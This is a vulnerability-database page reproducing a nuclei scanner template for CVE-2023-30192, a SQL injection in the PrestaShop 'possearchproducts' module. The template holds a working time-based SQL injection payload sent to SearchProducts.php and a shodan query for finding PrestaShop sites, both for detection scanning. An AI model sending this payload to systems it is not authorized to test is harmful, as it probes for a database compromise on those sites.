Lucene search
K

PrestaShop 'possearchproducts' <= 1.7 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

PrestaShop 'possearchproducts' vulnerability allows SQL injection leading to data leakage threats.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-30192
9 Jun 202514:27
circl
CNNVD
Prestashop possearchproducts SQL注入漏洞
11 May 202300:00
cnnvd
CVE
CVE-2023-30192
11 May 202300:00
cve
Cvelist
CVE-2023-30192
11 May 202300:00
cvelist
NVD
CVE-2023-30192
12 May 202300:15
nvd
OSV
CVE-2023-30192
12 May 202300:15
osv
Prion
Sql injection
12 May 202300:15
prion
Positive Technologies
PT-2023-22575 · Unknown · Prestashop
11 May 202300:00
ptsecurity
RedhatCVE
CVE-2023-30192
23 May 202506:05
redhatcve
Vulnrichment
CVE-2023-30192
11 May 202300:00
vulnrichment
Rows per page
id: CVE-2023-30192

info:
  name: PrestaShop 'possearchproducts' <= 1.7 - SQL Injection
  author: mastercho
  severity: critical
  description: |
    In the module “Search Products” (possearchproducts) from PosThemes for PrestaShop, a guest can perform SQL injection in affected versions.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30192
    - https://security.friendsofpresta.org/modules/2023/05/11/possearchproducts.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-30192
    cwe-id: CWE-89
    epss-score: 0.02678
    epss-percentile: 0.83979
  metadata:
    verified: true
    max-request: 2
    product: possearchproducts
    framework: prestashop
    shodan-query: http.component:"prestashop"
  tags: cve,cve2023,prestashop,sqli,time-based-sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(response), "prestashop", "possearchproducts")'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /modules/possearchproducts/SearchProducts.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id_category=10*if(now()=sysdate()%2Csleep(6)%2C0)&id_lang=3&resultsPerPage=10&s=the

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(tolower(response), "products")'
          - 'status_code != 404'
        condition: and
# digest: 4b0a00483046022100b102f6d92181c9ba66be3edcf4eaf585998d1bc352c64b09fd302e1f915c191a022100a157d4b4c36f1dc74a52b24b9401a1af993e7a8167c9b25b423b26808cfc573b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.02678
SSVC
25